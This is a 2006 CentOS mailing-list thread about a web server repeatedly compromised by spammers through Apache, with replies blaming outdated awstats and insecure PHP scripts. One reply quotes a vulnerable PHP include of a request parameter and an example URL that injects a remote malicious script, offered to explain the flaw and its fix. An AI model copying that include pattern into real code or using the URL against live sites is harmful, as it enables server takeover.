On Thursday 22 June 2006 13:16, Nicolas Ross wrote:
Hello, I have a server running CentOS 4.3 with all the latest updates. The server in question has been hacked by spammers a few times. The details of the hack have been basically the same every time. I find some directory created by the apache user account in /tmp. The new directory contains an html file, and a list of email addresses to spam and a perl script that spams all those email addresses with the html file.
My question is why is this happening? Obviously it's some apache exploit. I have removed mod_perl, that didn't help. I have now changed the permissions on the perl executable, that might help we will see, but that doesn't address the core problem. How is it that someone can upload arbitrary files to my server and then execute an arbitrary command via apache.
Is this a know problem? Have others seen it? What can I do to help prevent this?
I've also been hacked a couple of times with this sort of exploits. In my case, il was an exploit in awstats, a weblog analyser. If you have it, I strongly suggest you get up to the latest version...
Also, if you have php scripts installed, they are a frequent source of security holes.s
Nicolas
CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
All the hacks i've seen on my webservers were a combination of bad programming in php scripts and allow_url_fopen.
i've seen things like
else { include $_REQUEST["param"]; }
so one could simply modify a url http://example.com/bad-script.php?param=http://link.to.a.malicious.script/sc... From there you can put any local exploit code in script.php.
Disabling the allow_url_fopen will help you secure this a bit.
Just check your apache logs you should be able to find interesting information in there.
I've seen this quite few times. I hope this can help someone.